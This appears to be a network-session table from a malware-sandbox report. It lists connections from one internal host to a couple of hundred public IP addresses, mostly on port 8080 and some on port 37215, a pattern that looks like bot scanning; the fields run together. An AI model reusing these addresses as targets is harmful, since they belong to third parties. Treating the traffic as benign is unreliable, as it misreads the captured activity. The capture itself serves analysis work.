                                                        11105192.168.2.234014688.237.4.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11106192.168.2.234366441.115.119.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11107192.168.2.2345868138.30.150.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11108192.168.2.2337926211.175.52.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11109192.168.2.233968275.77.214.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11110192.168.2.2351048172.70.20.1008080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11111192.168.2.2360020186.29.156.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11112192.168.2.2344932103.2.58.1388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11113192.168.2.2340162216.9.217.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11114192.168.2.2335912191.136.23.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11115192.168.2.2340650190.158.106.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11116192.168.2.2338180170.87.180.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11117192.168.2.235495846.15.207.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11118192.168.2.2358492142.124.189.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11119192.168.2.235843876.147.55.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11120192.168.2.234898083.192.186.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11121192.168.2.234092444.145.9.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11122192.168.2.233754491.29.105.2088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11123192.168.2.2346516195.18.52.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11124192.168.2.2357746177.231.12.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11125192.168.2.235556273.161.0.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11126192.168.2.235799668.192.106.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11127192.168.2.2336408186.165.52.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11128192.168.2.2337406219.192.154.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11129192.168.2.2338688217.170.66.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11130192.168.2.233504837.227.206.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11131192.168.2.2359590132.214.182.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11132192.168.2.2347696201.48.241.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11133192.168.2.2335022137.226.186.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11134192.168.2.2354322172.178.163.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11135192.168.2.2353632104.136.242.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11136192.168.2.2340414141.111.95.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11137192.168.2.235497820.0.216.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11138192.168.2.2343170190.224.50.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11139192.168.2.2350964101.174.97.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11140192.168.2.2358232208.34.115.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11141192.168.2.233395089.96.54.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11142192.168.2.2339202212.100.100.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11143192.168.2.23447362.26.212.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11144192.168.2.235519087.8.181.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11145192.168.2.235827431.138.43.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11146192.168.2.2338192196.130.177.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11147192.168.2.235909899.172.62.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11148192.168.2.234379090.96.102.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11149192.168.2.233840680.42.237.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11150192.168.2.235859625.237.40.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11151192.168.2.2353616137.60.70.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11152192.168.2.235951051.138.89.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11153192.168.2.2359214133.218.235.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11154192.168.2.2343664179.103.163.2338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11155192.168.2.236052638.122.254.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11156192.168.2.2358708122.240.211.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11157192.168.2.2344044187.6.12.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11158192.168.2.2354480100.39.176.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11159192.168.2.2340376197.244.145.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11160192.168.2.235270049.78.99.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11161192.168.2.2340942173.113.116.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11162192.168.2.2340066173.80.94.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11163192.168.2.235402651.163.132.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11164192.168.2.234712657.248.28.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11165192.168.2.233617818.195.56.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11166192.168.2.234052676.214.154.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11167192.168.2.2342422191.60.92.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11168192.168.2.2341354129.135.110.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11169192.168.2.2333030138.18.206.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11170192.168.2.2338274167.6.69.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11171192.168.2.2337300157.132.23.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11172192.168.2.2338598157.152.136.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11173192.168.2.2354236166.198.48.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11174192.168.2.2335478157.119.220.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11175192.168.2.234706859.116.136.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11176192.168.2.235634841.168.126.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11177192.168.2.2354746179.141.229.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11178192.168.2.233765641.162.34.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11179192.168.2.2346056157.247.230.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11180192.168.2.234121241.30.181.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11181192.168.2.2333780197.108.202.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11182192.168.2.2337874178.95.84.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11183192.168.2.235815441.172.113.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11184192.168.2.235157490.248.233.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11185192.168.2.2343448126.246.10.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11186192.168.2.2349916180.247.66.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11187192.168.2.235399837.132.187.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11188192.168.2.2353408110.136.48.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11189192.168.2.234515623.114.221.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11190192.168.2.2333876153.238.119.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11191192.168.2.2347886221.53.19.438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11192192.168.2.2349708158.49.53.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11193192.168.2.2344218109.60.227.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11194192.168.2.235857463.187.82.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11195192.168.2.2335980180.169.61.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11196192.168.2.2335958199.193.33.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11197192.168.2.2359862211.254.108.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11198192.168.2.233868077.115.146.38080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11199192.168.2.2341424121.172.90.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11200192.168.2.233659417.108.79.298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11201192.168.2.235288474.248.224.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11202192.168.2.2352002201.95.144.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11203192.168.2.2345056122.18.45.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11204192.168.2.234234063.247.40.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11205192.168.2.2359590105.17.105.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11206192.168.2.2351636126.218.205.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11207192.168.2.2345430199.197.156.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11208192.168.2.2357114183.109.31.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11209192.168.2.2340056147.186.6.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11210192.168.2.23507989.43.47.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11211192.168.2.233947876.211.10.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11212192.168.2.235610427.68.197.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11213192.168.2.2358386150.205.248.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11214192.168.2.2346528205.223.36.268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11215192.168.2.2335546114.212.157.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11216192.168.2.234700662.5.114.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11217192.168.2.2354562164.252.116.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11218192.168.2.2357852202.80.126.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11219192.168.2.233523476.107.39.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11220192.168.2.234377887.104.96.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11221192.168.2.2334862162.216.41.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11222192.168.2.233449452.161.4.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11223192.168.2.2344342164.241.80.1378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11224192.168.2.2350016220.75.36.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11225192.168.2.235749286.36.246.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11226192.168.2.235628073.70.155.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11227192.168.2.2348764148.55.158.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11228192.168.2.235849223.90.6.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11229192.168.2.2351156186.205.54.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11230192.168.2.235637866.252.17.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11231192.168.2.2333640153.193.203.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11232192.168.2.2344508176.82.85.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11233192.168.2.234964858.160.133.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11234192.168.2.2352136126.117.230.98080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11235192.168.2.23491962.112.55.218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11236192.168.2.234010880.246.245.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11237192.168.2.2358348208.125.40.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11238192.168.2.233398058.33.165.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11239192.168.2.2350182184.145.47.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11240192.168.2.2348428221.105.105.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11241192.168.2.234619839.199.17.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11242192.168.2.234049075.212.141.1128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11243192.168.2.233565297.69.207.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11244192.168.2.2353590114.193.130.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11245192.168.2.2339186176.55.3.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11246192.168.2.2340692221.253.25.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11247192.168.2.2349730202.69.50.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11248192.168.2.235359896.168.129.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11249192.168.2.2352688181.237.140.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11250192.168.2.2340658179.235.183.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11251192.168.2.235992497.168.71.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11252192.168.2.2333018142.159.64.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11253192.168.2.234511674.220.86.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11254192.168.2.2334070199.230.239.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11255192.168.2.235169649.51.70.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11256192.168.2.2337008162.247.49.988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11257192.168.2.2349582126.111.225.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11258192.168.2.2340344138.132.18.1098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11259192.168.2.2344442194.127.81.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11260192.168.2.2345990154.54.72.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11261192.168.2.233975488.84.241.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11262192.168.2.2347486182.236.216.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11263192.168.2.234905445.244.69.1218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11264192.168.2.233476427.205.252.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11265192.168.2.2343576137.192.92.808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11266192.168.2.2334684125.58.99.2498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11267192.168.2.2334292159.255.32.2388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11268192.168.2.2342054100.221.169.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11269192.168.2.2338120124.214.59.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11270192.168.2.2344552147.176.116.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11271192.168.2.2354552102.159.174.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11272192.168.2.233751083.199.240.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11273192.168.2.2344670131.74.86.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11274192.168.2.235520098.164.201.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11275192.168.2.235708075.147.52.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11276192.168.2.2337204118.63.161.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11277192.168.2.2337674117.63.110.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11278192.168.2.2356356171.31.76.1308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11279192.168.2.234180297.164.40.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11280192.168.2.2359812162.157.141.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11281192.168.2.2338312172.209.136.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11282192.168.2.234380688.106.71.408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11283192.168.2.2360568200.158.97.1178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11284192.168.2.2333578134.45.80.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11285192.168.2.235790242.38.239.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11286192.168.2.235251234.152.120.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11287192.168.2.23358268.216.141.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11288192.168.2.2350460207.178.27.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11289192.168.2.2355834134.224.9.2128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11290192.168.2.2335516212.193.86.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11291192.168.2.234599234.125.230.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11292192.168.2.233780285.160.11.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11293192.168.2.235262079.147.38.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11294192.168.2.23371244.18.248.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11295192.168.2.2348112221.2.15.2278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11296192.168.2.2355104167.108.218.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11297192.168.2.2339280117.62.80.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11298192.168.2.2355242162.221.7.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11299192.168.2.235113087.225.38.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11300192.168.2.2338254120.24.34.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11301192.168.2.2355298135.146.89.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11302192.168.2.2349154207.227.142.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11303192.168.2.2342270213.211.112.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11304192.168.2.2352230100.239.71.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11305192.168.2.234804265.31.182.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11306192.168.2.2350854186.193.167.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11307192.168.2.235851291.75.150.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11308192.168.2.2333644116.24.144.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11309192.168.2.2343594135.56.89.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11310192.168.2.2357052200.76.64.948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11311192.168.2.2333022201.75.44.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11312192.168.2.233826046.120.128.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11313192.168.2.233926482.246.43.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11314192.168.2.235839025.77.209.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        11315192.168.2.2346486197.62.68.468080
